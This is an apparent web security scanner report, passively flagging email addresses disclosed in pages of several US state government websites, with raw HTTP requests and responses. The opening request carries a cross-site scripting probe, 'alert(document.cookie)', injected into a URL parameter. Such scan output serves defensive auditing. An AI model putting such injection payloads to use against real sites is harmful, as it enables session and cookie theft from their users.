GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 01-May-2011 15:08:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBir0eyREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Set-Cookie: ut="1%3AHcxBDoMgEEDRu8yahQNKG28jitF0MhawJeh4d4nb95N%2Fwl9Df8LHl7zFKUEPSaeIgt8yM8sgiPuhQjBHFgxvE0m0YKcSeaIqbs%2BbvMQ6o8aF7Fpsy5Wn5lerNKDADcw%2Brs8brusG"; path=/; domain=.adbrite.com; expires=Tue, 27-Apr-2021 15:08:25 GMT
Set-Cookie: vsd=0@1@4dbc25e9@www.kodakgallery.com; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 15:08:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

22.5. http://agency.governmentjobs.com/tennessee/default.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://agency.governmentjobs.com
Path:   /tennessee/default.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /tennessee/default.cfm HTTP/1.1
Host: agency.governmentjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" x
...[SNIP]...
<a href="mailto:HumanResources.WebSite@tn.gov">HumanResources.Website@tn.gov</a>
...[SNIP]...

22.6. http://alaska.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alaska.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: alaska.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/html
Content-Location: http://alaska.gov/home.html
Last-Modified: Sat, 30 Apr 2011 00:15:01 GMT
Accept-Ranges: bytes
ETag: "80b066a5cb6cc1:1aaa"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-FRAME-OPTIONS: SAMEORIGIN
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 22:10:00 GMT
Content-Length: 18991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<!-
...[SNIP]...
<a
href="mailto:webmaster@alaska.gov">
...[SNIP]...

22.7. http://alaska.gov/quote.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alaska.gov
Path:   /quote.html

Issue detail

The following email address was disclosed in the response:

Request

GET /quote.html HTTP/1.1
Host: alaska.gov
Proxy-Connection: keep-alive
Referer: http://alaska.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Last-Modified: Mon, 13 Sep 2010 23:24:44 GMT
Accept-Ranges: bytes
ETag: "06f2d89a53cb1:1aaa"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-FRAME-OPTIONS: SAMEORIGIN
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 22:10:26 GMT
Content-Length: 7527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
   <head>
       <!--
...[SNIP]...
<a href="mailto:webmaster@alaska.gov">
...[SNIP]...

22.8. http://amix.dk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amix.dk
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: amix.dk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Fri, 29 Apr 2011 21:19:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: amixdk=20110429171910-0f0fab812493ff454673ca8ae50a9162; expires=Fri, 13-May-2011 21:19:12 GMT; Path=/
Content-Length: 123380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<base href=
...[SNIP]...
<p>
Shoot me an email with a reference of your prior work to amix@amix.dk
</p>
...[SNIP]...
aybe a visit to Taiwan/Asia?) then I would recommend applying. Personally, working on Plurk has been such an amazing experience (both culturally and for my programming). So think about it and apply to jobs@plurk.com if you are interested!
</p>
...[SNIP]...
<span class="s">&#39;attacker@test.com&#39;</span>
...[SNIP]...
<pre>
$ git show e83c5163316f89bfbde7d9ab23ca2e25604af290 --stat
commit e83c5163316f89bfbde7d9ab23ca2e25604af290
Author: Linus Torvalds &lt;torvalds@ppc970.osdl.org&gt;
Date: Thu Apr 7 15:13:13 2005 -0700

Initial revision of "git", the information manager from hell

Makefile | 40 +++++++++
README | 168 ++++++++++++++++++++++++++++++++++++

...[SNIP]...

22.9. http://api.flickr.com/services/feeds/photoset.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /services/feeds/photoset.gne

Issue detail

The following email address was disclosed in the response:

Request

GET /services/feeds/photoset.gne?set=72157624089524858&nsid=48275616@N07&lang=en-us&format=json&jsoncallback=jsonp1304162036954 HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:49 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Mon, 25 Apr 2011 14:49:39 GMT
X-Served-By: www81.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 17832

jsonp1304162036954({
       "title": "Content from Favorites",
       "link": "http://www.flickr.com/photos/mogov/sets/72157624089524858",
       "description": "This set is set up to be used by the Mo.Gov website t
...[SNIP]...
<\/p>",
           "published": "2011-04-25T14:49:39Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "helicopter disasterresponse"
    },
    {
           "title": "Spring Snow",
           "link": "http://www.flickr.com/photos/mogov/5595585655/in/set-721576240895
...[SNIP]...
<\/p>",
           "published": "2011-04-06T20:32:25Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "flowers snow"
    },
    {
           "title": "DSC_1734",
           "link": "http://www.flickr.com/photos/mogov/4730993344/in/set-72157624089524858/",
           "media
...[SNIP]...
<\/p>",
           "published": "2011-04-04T18:47:13Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "solarcar jeffersoncity sunrayce americansolarchallenge"
    },
    {
           "title": "Governor Nixon at 2011 trout season opener",
           "link": "http://
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "fishing missouri troutfishing bennettspringsstatepark governorjaynixon missouri2011troutopener"
    },
    {
           "title": "2011 Missouri trout seas
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "fishing missouri trout troutfishing bennettspringsstatepark 2011missouritroutopener"
    },
    {
           "title": "GEDC8537",
           "link": "http://www.f
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "capitol missouri jeffersoncity snowmaggedon"
    },
    {
           "title": "GEDC8528",
           "link": "http://www.flickr.com/photos/mogov/5408779588/in/set
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "capitol missouri jeffersoncity snowmaggedon"
    },
    {
           "title": "2011 State of the State",
           "link": "http://www.flickr.com/photos/mogov/53
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "missourigovernorjaynixonmissouristateofthestate2011 jeffersoncitymissourihouseofrepresentativesmissouristatecapital"
    },
    {
           "title": "Deu
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "park tourism jay nixon governor recreation historicsite"
    },
    {
           "title": "Governor Nixon Visits State Parks",
           "link": "http://www.flic
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "park tourism jay nixon governor recreation historicsite"
    },
    {
           "title": "",
           "link": "http://www.flickr.com/photos/mogov/5097970748/in
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": ""
    },
    {
           "title": "",
           "link": "http://www.flickr.com/photos/mogov/5087379278/in/set-72157624089524858/",
           "media": {"m":"http://farm
...[SNIP]...
<\/p> ",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "festival harvest 2010"
    },
    {
           "title": "C130",
           "link": "http://www.flickr.com/photos/mogov/4830885588/in/set-72157624089524858/",
           "
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": ""
    },
    {
           "title": "Color Entwined Pine",
           "link": "http://www.flickr.com/photos/mogov/4459934453/in/set-72157624089524858/",
           "media"
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "fall parks stateparks hawnstatepark"
    },
    {
           "title": "Quarry at Elephant Rocks",
           "link": "http://www.flickr.com/photos/mogov/445993410
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "fall parks elephantrocks"
    },
    {
           "title": "Bullfrog",
           "link": "http://www.flickr.com/photos/mogov/4457535230/in/set-72157624089524858/
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "frogs"
    },
    {
           "title": "Reflection",
           "link": "http://www.flickr.com/photos/mogov/4439268340/in/set-72157624089524858/",
           "media": {"
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "bridges botanicalgardens"
    },
    {
           "title": "Mischievous Play",
           "link": "http://www.flickr.com/photos/mogov/4435829028/in/set-7215762408
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "zoo adventure stlouiszoo"
    },
    {
           "title": "Balloon Glow",
           "link": "http://www.flickr.com/photos/mogov/4435828034/in/set-72157624089524
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "adventure hotairballoons"
    },
    {
           "title": "Sunset Cruise",
           "link": "http://www.flickr.com/photos/mogov/4435056039/in/set-7215762408952
...[SNIP]...
<\/p>",
           "published": "2011-03-28T14:59:24Z",
           "author": "nobody@flickr.com (MoGov)",
           "author_id": "48275616@N07",
           "tags": "cars adventure"
    }
]
})

22.10. https://apps.tn.gov/apps/js/calendar1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /apps/js/calendar1.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /apps/js/calendar1.js HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/bizreg/tax_filer.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:07:42 GMT
Server: Apache
Last-Modified: Mon, 11 Oct 2010 15:37:56 GMT
ETag: "835a-1876-4925924eb7d00"
Accept-Ranges: bytes
Content-Length: 6262
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: application/x-javascript

// Title: Tigra Calendar
// URL: http://www.softcomplex.com/products/tigra_calendar/
// Version: 3.2 (European date format)
// Date: 10/14/2002 (mm/dd/yyyy)
// Feedback: feedback@softcomplex.com (specify product title in the subject)
// Note: Permission given to use this script in ANY kind of applications if
// header lines are left unchanged.
// Note: Script consists of two files: calendar?.js and calendar.html
// About us: Our company provides offshore IT consulting services.
// Contact us at sales@softcomplex.com if you have any programming task you
// want to be handled by professionals. Our typical hourly rate is $20.

// if two digit year input dates after this year considered 20 century.
var NUM_CENTYEA
...[SNIP]...

22.11. https://apps.tn.gov/apps/js/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /apps/js/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/controls.js HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/bizreg/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:35 GMT
Server: Apache
Last-Modified: Tue, 20 Apr 2010 22:25:22 GMT
ETag: "8355-8834-484b28da09880"
Accept-Ranges: bytes
Content-Length: 34868
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

22.12. https://apps.tn.gov/apps/js/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.tn.gov
Path:   /apps/js/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/js/dragdrop.js HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
Referer: https://apps.tn.gov/bizreg/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:34 GMT
Server: Apache
Last-Modified: Tue, 20 Apr 2010 22:25:22 GMT
ETag: "8358-7b75-484b28da09880"
Accept-Ranges: bytes
Content-Length: 31605
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive
Content-Type: application/x-javascript

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

22.13. http://assembly.state.ny.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assembly.state.ny.us
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: assembly.state.ny.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:24 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 19404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<META name="Keywords" content="New York State Assembly,
...[SNIP]...
<a href="mailto:webmaster@assembly.state.ny.us">
...[SNIP]...

22.14. http://assembly.state.ny.us/leg/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assembly.state.ny.us
Path:   /leg/

Issue detail

The following email address was disclosed in the response:

Request

GET /leg/ HTTP/1.1
Host: assembly.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:03 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 9550

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>

<HEAD>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<LINK REL="stylesheet" TYPE="text/css" HREF="/co
...[SNIP]...
<A HREF="mailto:webmaster@assembly.state.ny.us" CLASS="fontar8bwht">
...[SNIP]...

22.15. http://assembly.state.ny.us/mem/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assembly.state.ny.us
Path:   /mem/

Issue detail

The following email address was disclosed in the response:

Request

GET /mem/ HTTP/1.1
Host: assembly.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:04 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 11306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
<html>
<head>
   <title>New York State Assembly - Member Section</title>
<LINK REL="stylesheet" TYPE="text/css" HREF="css/memmain_style.cs
...[SNIP]...
<a href="mailto:webmaster@assembly.state.ny.us">
...[SNIP]...

22.16. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SACOM.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /PGM/ASP/SACOM.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 15110
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=KEPDNOPBNEHEIGLBKDOCIABI; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="EN">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Pragma" CONTEN
...[SNIP]...
<A href="mailto:dhsshelpdesk@state.de.us">dhsshelpdesk@state.de.us</A>
...[SNIP]...

22.17. http://az.gov/static/portal/js/CalendarPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://az.gov
Path:   /static/portal/js/CalendarPopup.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/portal/js/CalendarPopup.js HTTP/1.1
Host: az.gov
Proxy-Connection: keep-alive
Referer: http://az.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 23215
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 58450
Accept-Ranges: bytes
ETag: "b5fa0c-e452-1c029b00"
Last-Modified: Fri, 25 Sep 2009 22:02:52 GMT
Server: Apache/2.2.3 (Red Hat)
Date: Sat, 30 Apr 2011 04:47:21 GMT
Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE)

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purpose,
...[SNIP]...

22.18. http://blog.nheconomy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.nheconomy.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: blog.nheconomy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:14 GMT
Server: Apache
X-Pingback: http://blog.nheconomy.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:mhinkle@snhs.org">mhinkle@snhs.org</a>
...[SNIP]...
<a href="mailto:info@nheconomy.com">info@nheconomy.com</a>
...[SNIP]...

22.19. http://ca.gov/images/home/golden_gateway.f4v  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.gov
Path:   /images/home/golden_gateway.f4v

Issue detail

The following email address was disclosed in the response:

Request

GET /images/home/golden_gateway.f4v HTTP/1.1
Host: ca.gov
Proxy-Connection: keep-alive
Referer: http://ca.gov/images/home/golden_gateway.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobile=1; ASPSESSIONIDQQSRSTCB=NKLPJNDCDKNOLEJODMBGLFDB; __utmz=158387685.1304201409.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158387685.461511086.1304201409.1304201409.1304201409.1; __utmc=158387685; __utmb=158387685.2.10.1304201409

Response

HTTP/1.1 200 OK
Content-Type: video/mp4
Last-Modified: Wed, 16 Jun 2010 19:33:34 GMT
Accept-Ranges: bytes
ETag: "d84b56cf8adcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 22:10:13 GMT
Content-Length: 6418185

